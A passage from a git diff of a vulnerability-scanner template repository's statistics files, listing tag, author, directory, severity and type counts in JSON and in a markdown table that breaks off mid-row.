2},{"name":"jellyfin","count":2},{"name":"hjtcloud","count":2},{"name":"shellshock","count":2},{"name":"huawei","count":2},{"name":"trixbox","count":2},{"name":"chamilo","count":2},{"name":"bitrix","count":2},{"name":"hashicorp","count":2},{"name":"cve2008","count":2},{"name":"yapi","count":2},{"name":"service","count":2},{"name":"showdoc","count":2},{"name":"mida","count":2},{"name":"email","count":1},{"name":"zimbra","count":1},{"name":"moinmoin","count":1},{"name":"mpsec","count":1},{"name":"upnp","count":1},{"name":"jquery","count":1},{"name":"csod","count":1},{"name":"gateone","count":1},{"name":"etouch","count":1},{"name":"sidekiq","count":1},{"name":"xff","count":1},{"name":"expn","count":1},{"name":"wildfly","count":1},{"name":"openstack","count":1},{"name":"nordex","count":1},{"name":"webmin","count":1},{"name":"trilithic","count":1},{"name":"optiLink","count":1},{"name":"node","count":1},{"name":"robomongo","count":1},{"name":"idemia","count":1},{"name":"spring","count":1},{"name":"pyramid","count":1},{"name":"blackboard","count":1},{"name":"hadoop","count":1},{"name":"pgadmin","count":1},{"name":"favicon","count":1},{"name":"mediumish","count":1},{"name":"payara","count":1},{"name":"interlib","count":1},{"name":"netrc","count":1},{"name":"fedora","count":1},{"name":"floc","count":1},{"name":"maccmsv10","count":1},{"name":"heroku","count":1},{"name":"aspnuke","count":1},{"name":"yachtcontrol","count":1},{"name":"upload","count":1},{"name":"gogs","count":1},{"name":"tpshop","count":1},{"name":"spidercontrol","count":1},{"name":"backdoor","count":1},{"name":"redis","count":1},{"name":"tapestry","count":1},{"name":"jeewms","count":1},{"name":"timeclock","count":1},{"name":"bullwark","count":1},{"name":"ricoh","count":1},{"name":"emby","count":1},{"name":"socomec","count":1},{"name":"realteo","count":1},{"name":"checkpoint","count":1},{"name":"rmc","count":1},{"name":"wuzhicms","count":1},{"name":"ioncube","count":1},{"name":"domxss","count":1},{"name":"timesheet","count":1},{"name":"grails","count":1},{"name":"zend","count":1},{"name":"tongda","count":1},{"name":"hortonworks","count":1},{"name":"panabit","count":1},{"name":"db","count":1},{"name":"doh","count":1},{"name":"csrf","count":1},{"name":"zcms","count":1},{"name":"nps","count":1},{"name":"ilo4","count":1},{"name":"postgres","count":1},{"name":"calendarix","count":1},{"name":"majordomo2","count":1},{"name":"kerbynet","count":1},{"name":"dvr","count":1},{"name":"alertmanager","count":1},{"name":"codeigniter","count":1},{"name":"xml","count":1},{"name":"cobub","count":1},{"name":"starttls","count":1},{"name":"clockwatch","count":1},{"name":"ntopng","count":1},{"name":"traefik","count":1},{"name":"opentsdb","count":1},{"name":"beanshell","count":1},{"name":"cve2010","count":1},{"name":"74cms","count":1},{"name":"tenda","count":1},{"name":"enum","count":1},{"name":"akamai","count":1},{"name":"circontrol","count":1},{"name":"harbor","count":1},{"name":"haproxy","count":1},{"name":"sco","count":1},{"name":"biometrics","count":1},{"name":"ruby","count":1},{"name":"dotnet","count":1},{"name":"ulterius","count":1},{"name":"primetek","count":1},{"name":"pacsone","count":1},{"name":"concrete","count":1},{"name":"faraday","count":1},{"name":"k8","count":1},{"name":"cors","count":1},{"name":"postmessage","count":1},{"name":"woocomernce","count":1},{"name":"dotnetnuke","count":1},{"name":"jnoj","count":1},{"name":"geutebruck","count":1},{"name":"yii","count":1},{"name":"b2evolution","count":1},{"name":"mcafee","count":1},{"name":"seacms","count":1},{"name":"kubeflow","count":1},{"name":"fortigate","count":1},{"name":"jsf","count":1},{"name":"ssltls","count":1},{"name":"bolt","count":1},{"name":"wavemaker","count":1},{"name":"apiman","count":1},{"name":"mailchimp","count":1},{"name":"nedi","count":1},{"name":"plc","count":1},{"name":"sqlite","count":1},{"name":"linkedin","count":1},{"name":"skywalking","count":1},{"name":"razor","count":1},{"name":"cloudflare","count":1},{"name":"emc","count":1},{"name":"ecom","count":1},{"name":"rhymix","count":1},{"name":"drone","count":1},{"name":"dompdf","count":1},{"name":"appweb","count":1},{"name":"nomad","count":1},{"name":"webmodule-ee","count":1},{"name":"esmtp","count":1},{"name":"aura","count":1},{"name":"cse","count":1},{"name":"salesforce","count":1},{"name":"opencast","count":1},{"name":"targa","count":1},{"name":"pulsesecure","count":1},{"name":"jsp","count":1},{"name":"jfrog","count":1},{"name":"jmx","count":1},{"name":"centos","count":1},{"name":"ganglia","count":1},{"name":"wp-theme","count":1},{"name":"monitorr","count":1},{"name":"vsftpd","count":1},{"name":"zmanda","count":1},{"name":"rdp","count":1},{"name":"jenzabar","count":1},{"name":"octobercms","count":1},{"name":"blue-ocean","count":1},{"name":"nuuo","count":1},{"name":"ambari","count":1},{"name":"circontrorl","count":1},{"name":"swagger","count":1},{"name":"cve2005","count":1},{"name":"flash","count":1},{"name":"chinaunicom","count":1},{"name":"node-red-dashboard","count":1},{"name":"jenkin","count":1},{"name":"zenario","count":1},{"name":"extractor","count":1},{"name":"bookstack","count":1},{"name":"tensorflow","count":1},{"name":"fastcgi","count":1},{"name":"dom","count":1},{"name":"monitorix","count":1},{"name":"liferay","count":1},{"name":"netsweeper","count":1},{"name":"acme","count":1},{"name":"status","count":1},{"name":"klog","count":1},{"name":"visionhub","count":1},{"name":"wazuh","count":1},{"name":"firebase","count":1},{"name":"ssl","count":1},{"name":"plugin","count":1},{"name":"javafaces","count":1},{"name":"fiori","count":1},{"name":"springframework","count":1},{"name":"turbocrm","count":1},{"name":"erp-nc","count":1},{"name":"mirai","count":1},{"name":"smartsense","count":1},{"name":"lanproxy","count":1},{"name":"landrayoa","count":1},{"name":"hasura","count":1},{"name":"cgi","count":1},{"name":"opensmtpd","count":1},{"name":"proftpd","count":1},{"name":"st","count":1},{"name":"dvwa","count":1},{"name":"feifeicms","count":1},{"name":"shopware","count":1},{"name":"alerta","count":1},{"name":"eyou","count":1},{"name":"sentry","count":1},{"name":"sarg","count":1},{"name":"mysql","count":1},{"name":"weiphp","count":1},{"name":"kafdrop","count":1},{"name":"phalcon","count":1},{"name":"thinkadmin","count":1},{"name":"adminer","count":1},{"name":"tensorboard","count":1},{"name":"itop","count":1},{"name":"arl","count":1},{"name":"cve2007","count":1},{"name":"zte","count":1},{"name":"ems","count":1},{"name":"webadmin","count":1},{"name":"fuelcms","count":1},{"name":"tileserver","count":1},{"name":"moin","count":1},{"name":"netdata","count":1},{"name":"rfi","count":1},{"name":"totaljs","count":1},{"name":"druid","count":1},{"name":"phpinfo","count":1},{"name":"cocoon","count":1},{"name":"htmli","count":1},{"name":"wamp","count":1},{"name":"stem","count":1},{"name":"mautic","count":1},{"name":"wmt","count":1},{"name":"javamelody","count":1},{"name":"nsasg","count":1},{"name":"pippoint","count":1},{"name":"opensns","count":1},{"name":"openrestry","count":1},{"name":"goahead","count":1},{"name":"soar","count":1},{"name":"ueditor","count":1},{"name":"landray","count":1},{"name":"zarafa","count":1},{"name":"2014","count":1},{"name":"octoprint","count":1},{"name":"lotuscms","count":1},{"name":"gloo","count":1},{"name":"avalanche","count":1},{"name":"xdcms","count":1},{"name":"linksys","count":1},{"name":"clave","count":1},{"name":"nc2","count":1},{"name":"bitly","count":1},{"name":"viewlinc","count":1},{"name":"tika","count":1},{"name":"gitlist","count":1},{"name":"plastic","count":1},{"name":"darkstat","count":1},{"name":"opm","count":1},{"name":"k8s","count":1},{"name":"codemeter","count":1},{"name":"netis","count":1},{"name":"kyan","count":1},{"name":"linkerd","count":1},{"name":"fortilogger","count":1},{"name":"webui","count":1},{"name":"tamronos","count":1},{"name":"spf","count":1},{"name":"cloudinary","count":1},{"name":"zzzcms","count":1},{"name":"shopxo","count":1},{"name":"glances","count":1},{"name":"wiki","count":1},{"name":"webftp","count":1},{"name":"ec2","count":1},{"name":"nexusdb","count":1},{"name":"npm","count":1},{"name":"axis","count":1},{"name":"finereport","count":1},{"name":"parentlink","count":1},{"name":"enumeration","count":1},{"name":"wifisky","count":1},{"name":"szhe","count":1},{"name":"krweb","count":1},{"name":"triconsole","count":1},{"name":"livezilla","count":1},{"name":"selea","count":1},{"name":"svnserve","count":1},{"name":"rabbitmq","count":1},{"name":"rsyncd","count":1},{"name":"synnefo","count":1},{"name":"dlogin","count":1},{"name":"uwsgi","count":1},{"name":"phpunit","count":1},{"name":"empirecms","count":1},{"name":"mongoshake","count":1},{"name":"plone","count":1},{"name":"kong","count":1},{"name":"rubedo","count":1},{"name":"wooyun","count":1},{"name":"flink","count":1},{"name":"comodo","count":1},{"name":"vsphere","count":1},{"name":"panos","count":1},{"name":"azure","count":1},{"name":"wso2","count":1},{"name":"nette","count":1},{"name":"xiuno","count":1},{"name":"anchorcms","count":1},{"name":"svn","count":1},{"name":"zookeeper","count":1},{"name":"redhat","count":1},{"name":"keenetic","count":1},{"name":"saltapi","count":1},{"name":"mdb","count":1},{"name":"acexy","count":1},{"name":"redwood","count":1},{"name":"bash","count":1},{"name":"horde","count":1},{"name":"servicedesk","count":1},{"name":"duomicms","count":1},{"name":"portainer","count":1},{"name":"myucms","count":1},{"name":"setup","count":1},{"name":"gridx","count":1},{"name":"zeroshell","count":1},{"name":"scs","count":1},{"name":"mongo","count":1},{"name":"symfony","count":1},{"name":"varnish","count":1},{"name":"metinfo","count":1},{"name":"embedthis","count":1},{"name":"lansweeper","count":1},{"name":"nuxeo","count":1},{"name":"rmi","count":1},{"name":"grav","count":1},{"name":"xunchi","count":1},{"name":"mara","count":1},{"name":"blind","count":1},{"name":"spectracom","count":1},{"name":"openerp","count":1},{"name":"crm","count":1},{"name":"servicenow","count":1},{"name":"discord","count":1},{"name":"clusterengine","count":1},{"name":"jitsi","count":1},{"name":"exchange","count":1},{"name":"bruteforce","count":1},{"name":"lancom","count":1},{"name":"javascript","count":1},{"name":"vscode","count":1},{"name":"labtech","count":1},{"name":"sitecore","count":1},{"name":"rujjie","count":1},{"name":"sprintful","count":1},{"name":"fortigates","count":1},{"name":"igs","count":1},{"name":"zm","count":1},{"name":"oscommerce","count":1},{"name":"memcached","count":1},{"name":"fortiweb","count":1},{"name":"episerver","count":1},{"name":"huijietong","count":1},{"name":"mobileiron","count":1},{"name":"alibaba","count":1},{"name":"fortinet","count":1},{"name":"diris","count":1},{"name":"mantisbt","count":1},{"name":"viewpoint","count":1},{"name":"geddy","count":1},{"name":"avtech","count":1},{"name":"subrion","count":1},{"name":"fastapi","count":1},{"name":"discourse","count":1},{"name":"powercreator","count":1},{"name":"ns","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":79},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":36},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"techbrunchfr","count":13},{"name":"milo2012","count":13},{"name":"suman_kar","count":12},{"name":"pr3r00t","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"wdahlenb","count":8},{"name":"nadino","count":8},{"name":"hackergautam","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"emadshanab","count":7},{"name":"r3dg33k","count":7},{"name":"0x240x23elu","count":7},{"name":"dr_set","count":7},{"name":"melbadry9","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"that_juan_","count":7},{"name":"philippedelteil","count":6},{"name":"__fazal","count":6},{"name":"yanyun","count":5},{"name":"caspergn","count":5},{"name":"puzzlepeaches","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"nodauf","count":4},{"name":"xelkomy","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"rootxharsh","count":4},{"name":"meme-lord","count":4},{"name":"iamnoooob","count":4},{"name":"z3bd","count":3},{"name":"f1tz","count":3},{"name":"kophjager007","count":3},{"name":"0w4ys","count":3},{"name":"joanbono","count":3},{"name":"impramodsargar","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"thomas_from_offensity","count":3},{"name":"shine","count":3},{"name":"fyoorer","count":3},{"name":"jarijaas","count":2},{"name":"0xprial","count":2},{"name":"vavkamil","count":2},{"name":"swissky","count":2},{"name":"incogbyte","count":2},{"name":"foulenzer","count":2},{"name":"unstabl3","count":2},{"name":"manas_harsh","count":2},{"name":"mavericknerd","count":2},{"name":"0xelkomy","count":2},{"name":"shifacyclewala","count":2},{"name":"pxmme1337","count":2},{"name":"joeldeleep","count":2},{"name":"hetroublemakr","count":2},{"name":"lotusdll","count":2},{"name":"0xcrypto","count":2},{"name":"random-robbie","count":2},{"name":"kiblyn11","count":2},{"name":"x1m_martijn","count":2},{"name":"afaq","count":2},{"name":"amsda","count":2},{"name":"0xsapra","count":2},{"name":"0xrudra","count":2},{"name":"emenalf","count":2},{"name":"gevakun","count":2},{"name":"bp0lr","count":2},{"name":"elsfa7110","count":2},{"name":"moritz nentwig","count":2},{"name":"zomsop82","count":2},{"name":"lu4nx","count":2},{"name":"udit_thakkur","count":2},{"name":"bsysop","count":2},{"name":"davidmckennirey","count":2},{"name":"dheerajmadhukar","count":2},{"name":"ehsahil","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"ree4pwn","count":2},{"name":"randomrobbie","count":2},{"name":"streetofhackerr007","count":1},{"name":"yashgoti","count":1},{"name":"patralos","count":1},{"name":"dawid czarnecki","count":1},{"name":"regala_","count":1},{"name":"mhdsamx","count":1},{"name":"@dwisiswant0","count":1},{"name":"noamrathaus","count":1},{"name":"becivells","count":1},{"name":"bolli95","count":1},{"name":"yavolo","count":1},{"name":"tim_koopmans","count":1},{"name":"wabafet","count":1},{"name":"d0rkerdevil","count":1},{"name":"exploitation","count":1},{"name":"_harleo","count":1},{"name":"0xrod","count":1},{"name":"zhenwarx","count":1},{"name":"bjhulst","count":1},{"name":"hanlaomo","count":1},{"name":"sullo","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"shreyapohekar","count":1},{"name":"co0nan","count":1},{"name":"abison_binoy","count":1},{"name":"remonsec","count":1},{"name":"raesene","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"c3l3si4n","count":1},{"name":"hakluke","count":1},{"name":"willd96","count":1},{"name":"th3.d1p4k","count":1},{"name":"luci","count":1},{"name":"s1r1u5_","count":1},{"name":"elmahdi","count":1},{"name":"rodnt","count":1},{"name":"alifathi-h1","count":1},{"name":"fopina","count":1},{"name":"defr0ggy","count":1},{"name":"dudez","count":1},{"name":"qlkwej","count":1},{"name":"nkxxkn","count":1},{"name":"akash.c","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"soyelmago","count":1},{"name":"0xtavian","count":1},{"name":"thevillagehacker","count":1},{"name":"vsh00t","count":1},{"name":"rtcms","count":1},{"name":"zandros0","count":1},{"name":"_c0wb0y_","count":1},{"name":"0h1in9e","count":1},{"name":"juicypotato1","count":1},{"name":"smaranchand","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"ringo","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"apt-mirror","count":1},{"name":"kareemse1im","count":1},{"name":"vzamanillo","count":1},{"name":"andirrahmani1","count":1},{"name":"b4uh0lz","count":1},{"name":"ahmed sherif","count":1},{"name":"geraldino2","count":1},{"name":"yashanand155","count":1},{"name":"micha3lb3n","count":1},{"name":"alex","count":1},{"name":"ohlinge","count":1},{"name":"iampritam","count":1},{"name":"_darrenmartyn","count":1},{"name":"alperenkesk","count":1},{"name":"taielab","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"ldionmarcil","count":1},{"name":"sickwell","count":1},{"name":"idealphase","count":1},{"name":"shelld3v","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"mah3sec_","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"johnk3r","count":1},{"name":"luskabol","count":1},{"name":"mubassirpatel","count":1},{"name":"_generic_human_","count":1},{"name":"ajaysenr","count":1},{"name":"whynotke","count":1},{"name":"mohammedsaneem","count":1},{"name":"alph4byt3","count":1},{"name":"knassar702","count":1},{"name":"affix","count":1},{"name":"arcc","count":1},{"name":"notsoevilweasel","count":1},{"name":"undefl0w","count":1},{"name":"j33n1k4","count":1},{"name":"blckraven","count":1},{"name":"flag007","count":1},{"name":"0ut0fb4nd","count":1},{"name":"koti2","count":1},{"name":"jeya seelan","count":1},{"name":"cookiehanhoan","count":1},{"name":"omarkurt","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"furkansenan","count":1},{"name":"manuelbua","count":1},{"name":"schniggie","count":1},{"name":"ilovebinbash","count":1},{"name":"johnjhacking","count":1},{"name":"kabirsuda","count":1},{"name":"sshell","count":1},{"name":"pudsec","count":1},{"name":"shifacyclewla","count":1},{"name":"berkdusunur","count":1},{"name":"bad5ect0r","count":1},{"name":"divya_mudgal","count":1},{"name":"ooooooo_q","count":1},{"name":"bing0o","count":1},{"name":"akshansh","count":1},{"name":"kurohost","count":1},{"name":"daviey","count":1},{"name":"absshax","count":1},{"name":"rojanrijal","count":1},{"name":"ipanda","count":1},{"name":"sy3omda","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"52971","count":1},{"name":"dogasantos","count":1},{"name":"deena","count":1},{"name":"fmunozs","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"thezakman","count":1},{"name":"r3naissance","count":1},{"name":"pdp","count":1},{"name":"chron0x","count":1},{"name":"toufik airane","count":1},{"name":"w4cky_","count":1},{"name":"sicksec","count":1},{"name":"its0x08","count":1},{"name":"gal nagli","count":1},{"name":"naglinagli","count":1},{"name":"tirtha_mandal","count":1},{"name":"gboddin","count":1},{"name":"nytr0gen","count":1},{"name":"fabaff","count":1}],"directory":[{"name":"cves","count":470},{"name":"vulnerabilities","count":233},{"name":"exposed-panels","count":202},{"name":"exposures","count":150},{"name":"technologies","count":129},{"name":"misconfiguration","count":114},{"name":"takeovers","count":70},{"name":"default-logins","count":44},{"name":"file","count":42},{"name":"workflows","count":33},{"name":"miscellaneous","count":27},{"name":"network","count":25},{"name":"iot","count":18},{"name":"dns","count":10},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":453},{"name":"high","count":395},{"name":"medium","count":313},{"name":"critical","count":187},{"name":"low","count":150}],"types":[{"name":"http","count":1409},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} +{} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index c075bbd196..7e09824ddd 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,601 +1,2 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 464 | dhiyaneshdk | 202 | cves | 470 | info | 453 | http | 1408 | -| panel | 201 | pdteam | 184 | vulnerabilities | 232 | high | 395 | file | 42 | -| xss | 168 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 | -| wordpress | 165 | dwisiswant0 | 113 | exposures | 150 | critical | 186 | dns | 10 | -| rce | 161 | geeknik | 88 | technologies | 129 | low | 150 | | | -| exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | | -| cve2020 | 135 | madrobot | 59 | takeovers | 70 | | | | | -| lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | | -| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | | -| cve2019 | 82 | gy741 | 35 | workflows | 33 | | | | | -| config | 81 | ice3man | 26 | miscellaneous | 27 | | | | | -| tech | 72 | pussycat0x | 25 | network | 25 | | | | | -| takeover | 71 | 0x_akoko | 20 | iot | 18 | | | | | -| cve2021 | 71 | organiccrap | 19 | dns | 10 | | | | | -| token | 63 | sheikhrishad | 15 | fuzzing | 10 | | | | | -| cve2018 | 62 | milo2012 | 13 | cnvd | 9 | | | | | -| apache | 60 | techbrunchfr | 13 | headless | 5 | | | | | -| default-login | 45 | suman_kar | 12 | .pre-commit-config.yaml | 1 | | | | | -| cve2017 | 43 | pr3r00t | 12 | | | | | | | -| file | 42 | cyllective | 11 | | | | | | | -| unauth | 39 | random_robbie | 10 | | | | | | | -| iot | 33 | righettod | 9 | | | | | | | -| network | 32 | wdahlenb | 8 | | | | | | | -| sqli | 29 | hackergautam | 8 | | | | | | | -| oracle | 29 | nadino | 8 | | | | | | | -| workflow | 28 | aashiq | 8 | | | | | | | -| misc | 27 | iamthefrogy | 8 | | | | | | | -| atlassian | 26 | harshbothra_ | 7 | | | | | | | -| ssrf | 25 | randomstr1ng | 7 | | | | | | | -| jira | 25 | techryptic (@tech) | 7 | | | | | | | -| disclosure | 24 | oppsec | 7 | | | | | | | -| oob | 24 | r3dg33k | 7 | | | | | | | -| logs | 24 | emadshanab | 7 | | | | | | | -| redirect | 20 | 0x240x23elu | 7 | | | | | | | -| aem | 18 | dr_set | 7 | | | | | | | -| listing | 15 | that_juan_ | 7 | | | | | | | -| cisco | 15 | melbadry9 | 7 | | | | | | | -| sap | 14 | philippedelteil | 6 | | | | | | | -| cve2016 | 14 | __fazal | 6 | | | | | | | -| debug | 13 | yanyun | 5 | | | | | | | -| struts | 13 | panch0r3d | 5 | | | | | | | -| misconfig | 13 | puzzlepeaches | 5 | | | | | | | -| cve2015 | 13 | caspergn | 5 | | | | | | | -| fuzz | 13 | pentest_swissky | 5 | | | | | | | -| weblogic | 12 | ganofins | 5 | | | | | | | -| android | 12 | iamnoooob | 4 | | | | | | | -| dns | 11 | xelkomy | 4 | | | | | | | -| auth-bypass | 11 | e_schultze_ | 4 | | | | | | | -| zoho | 11 | rootxharsh | 4 | | | | | | | -| springboot | 11 | meme-lord | 4 | | | | | | | -| devops | 10 | nodauf | 4 | | | | | | | -| cve2011 | 10 | github.com/its0x08 | 4 | | | | | | | -| jenkins | 9 | shine | 3 | | | | | | | -| cve2012 | 9 | thomas_from_offensity | 3 | | | | | | | -| magento | 9 | tess | 3 | | | | | | | -| dlink | 9 | 0w4ys | 3 | | | | | | | -| aws | 8 | impramodsargar | 3 | | | | | | | -| php | 8 | yash anand @yashanand155 | 3 | | | | | | | -| gitlab | 8 | z3bd | 3 | | | | | | | -| cve2013 | 8 | f1tz | 3 | | | | | | | -| cnvd | 8 | fyoorer | 3 | | | | | | | -| airflow | 8 | binaryfigments | 3 | | | | | | | -| adobe | 8 | kophjager007 | 3 | | | | | | | -| ftp | 8 | joanbono | 3 | | | | | | | -| scada | 7 | 0xprial | 2 | | | | | | | -| joomla | 7 | vavkamil | 2 | | | | | | | -| cve2014 | 7 | swissky | 2 | | | | | | | -| vmware | 7 | joeldeleep | 2 | | | | | | | -| citrix | 6 | elsfa7110 | 2 | | | | | | | -| nginx | 6 | randomrobbie | 2 | | | | | | | -| cms | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| rails | 6 | afaq | 2 | | | | | | | -| backup | 6 | manas_harsh | 2 | | | | | | | -| xxe | 6 | pxmme1337 | 2 | | | | | | | -| api | 6 | shifacyclewala | 2 | | | | | | | -| google | 6 | ehsahil | 2 | | | | | | | -| rconfig | 6 | mavericknerd | 2 | | | | | | | -| iis | 5 | 0xsapra | 2 | | | | | | | -| jetty | 5 | x1m_martijn | 2 | | | | | | | -| phpmyadmin | 5 | random-robbie | 2 | | | | | | | -| login | 5 | bp0lr | 2 | | | | | | | -| circarlife | 5 | moritz nentwig | 2 | | | | | | | -| ssti | 5 | davidmckennirey | 2 | | | | | | | -| lucee | 5 | amsda | 2 | | | | | | | -| dell | 5 | foulenzer | 2 | | | | | | | -| solr | 5 | ree4pwn | 2 | | | | | | | -| laravel | 5 | kiblyn11 | 2 | | | | | | | -| headless | 5 | hetroublemakr | 2 | | | | | | | -| ruijie | 5 | 0xcrypto | 2 | | | | | | | -| confluence | 5 | bsysop | 2 | | | | | | | -| java | 5 | dheerajmadhukar | 2 | | | | | | | -| drupal | 5 | gevakun | 2 | | | | | | | -| router | 4 | udit_thakkur | 2 | | | | | | | -| vpn | 4 | unstabl3 | 2 | | | | | | | -| moodle | 4 | emenalf | 2 | | | | | | | -| hongdian | 4 | incogbyte | 2 | | | | | | | -| magmi | 4 | lu4nx | 2 | | | | | | | -| netgear | 4 | zomsop82 | 2 | | | | | | | -| samsung | 4 | lotusdll | 2 | | | | | | | -| jolokia | 4 | 0xelkomy | 2 | | | | | | | -| docker | 4 | jarijaas | 2 | | | | | | | -| artifactory | 4 | 0xrudra | 2 | | | | | | | -| ibm | 4 | manuelbua | 1 | | | | | | | -| asp | 4 | absshax | 1 | | | | | | | -| thinkcmf | 4 | idealphase | 1 | | | | | | | -| cve2009 | 4 | notsoevilweasel | 1 | | | | | | | -| tomcat | 4 | schniggie | 1 | | | | | | | -| django | 4 | 0ut0fb4nd | 1 | | | | | | | -| nodejs | 4 | raesene | 1 | | | | | | | -| webserver | 4 | @dwisiswant0 | 1 | | | | | | | -| traversal | 4 | th3.d1p4k | 1 | | | | | | | -| solarwinds | 4 | patralos | 1 | | | | | | | -| thinkphp | 4 | ringo | 1 | | | | | | | -| fileupload | 4 | kba@sogeti_esec | 1 | | | | | | | -| elastic | 4 | nytr0gen | 1 | | | | | | | -| kubernetes | 3 | co0nan | 1 | | | | | | | -| backups | 3 | _generic_human_ | 1 | | | | | | | -| deserialization | 3 | aceseven (digisec360) | 1 | | | | | | | -| windows | 3 | whynotke | 1 | | | | | | | -| printer | 3 | rtcms | 1 | | | | | | | -| resin | 3 | 0xrod | 1 | | | | | | | -| crlf | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| caucho | 3 | ratnadip gajbhiye | 1 | | | | | | | -| amazon | 3 | andirrahmani1 | 1 | | | | | | | -| r-seenet | 3 | divya_mudgal | 1 | | | | | | | -| fanruan | 3 | qlkwej | 1 | | | | | | | -| ofbiz | 3 | yavolo | 1 | | | | | | | -| springcloud | 3 | mubassirpatel | 1 | | | | | | | -| kafka | 3 | smaranchand | 1 | | | | | | | -| ssh | 3 | jeya seelan | 1 | | | | | | | -| git | 3 | streetofhackerr007 | 1 | | | | | | | -| vbulletin | 3 | sickwell | 1 | | | | | | | -| oa | 3 | alifathi-h1 | 1 | | | | | | | -| nacos | 3 | knassar702 | 1 | | | | | | | -| microstrategy | 3 | yashgoti | 1 | | | | | | | -| fpd | 3 | mah3sec_ | 1 | | | | | | | -| nosqli | 3 | blckraven | 1 | | | | | | | -| terramaster | 3 | c3l3si4n | 1 | | | | | | | -| grafana | 3 | kurohost | 1 | | | | | | | -| openssh | 3 | dawid czarnecki | 1 | | | | | | | -| slack | 3 | shifacyclewla | 1 | | | | | | | -| ebs | 3 | flag007 | 1 | | | | | | | -| dedecms | 3 | sshell | 1 | | | | | | | -| log | 3 | tim_koopmans | 1 | | | | | | | -| bypass | 3 | akash.c | 1 | | | | | | | -| lfr | 3 | alperenkesk | 1 | | | | | | | -| mongodb | 3 | arcc | 1 | | | | | | | -| sonarqube | 2 | undefl0w | 1 | | | | | | | -| flir | 2 | dudez | 1 | | | | | | | -| webcam | 2 | deena | 1 | | | | | | | -| couchdb | 2 | wabafet | 1 | | | | | | | -| microsoft | 2 | vsh00t | 1 | | | | | | | -| injection | 2 | alex | 1 | | | | | | | -| hjtcloud | 2 | luci | 1 | | | | | | | -| ucmdb | 2 | rodnt | 1 | | | | | | | -| httpd | 2 | luskabol | 1 | | | | | | | -| rstudio | 2 | gal nagli | 1 | | | | | | | -| zhiyuan | 2 | ldionmarcil | 1 | | | | | | | -| odoo | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| telerik | 2 | b4uh0lz | 1 | | | | | | | -| bitrix | 2 | @github.com/defr0ggy | 1 | | | | | | | -| jellyfin | 2 | sy3omda | 1 | | | | | | | -| yapi | 2 | kareemse1im | 1 | | | | | | | -| paloalto | 2 | fmunozs | 1 | | | | | | | -| jboss | 2 | elmahdi | 1 | | | | | | | -| kentico | 2 | affix | 1 | | | | | | | -| chamilo | 2 | iampritam | 1 | | | | | | | -| sharepoint | 2 | fopina | 1 | | | | | | | -| vrealize | 2 | remonsec | 1 | | | | | | | -| oauth | 2 | hanlaomo | 1 | | | | | | | -| saltstack | 2 | chron0x | 1 | | | | | | | -| dos | 2 | johnjhacking | 1 | | | | | | | -| hpe | 2 | vzamanillo | 1 | | | | | | | -| cache | 2 | defr0ggy | 1 | | | | | | | -| service | 2 | bolli95 | 1 | | | | | | | -| glassfish | 2 | apt-mirror | 1 | | | | | | | -| leak | 2 | abison_binoy | 1 | | | | | | | -| mida | 2 | pdp | 1 | | | | | | | -| smb | 2 | shreyapohekar | 1 | | | | | | | -| hp | 2 | dogasantos | 1 | | | | | | | -| hashicorp | 2 | _c0wb0y_ | 1 | | | | | | | -| coldfusion | 2 | furkansenan | 1 | | | | | | | -| pega | 2 | koti2 | 1 | | | | | | | -| proxy | 2 | thezakman | 1 | | | | | | | -| nagios | 2 | d0rkerdevil | 1 | | | | | | | -| cve2008 | 2 | naglinagli | 1 | | | | | | | -| kibana | 2 | r3naissance | 1 | | | | | | | -| idrac | 2 | nkxxkn | 1 | | | | | | | -| openfire | 2 | s1r1u5_ | 1 | | | | | | | -| waf | 2 | 52971 | 1 | | | | | | | -| showdoc | 2 | exploitation | 1 | | | | | | | -| shellshock | 2 | akshansh | 1 | | | | | | | -| wordfence | 2 | 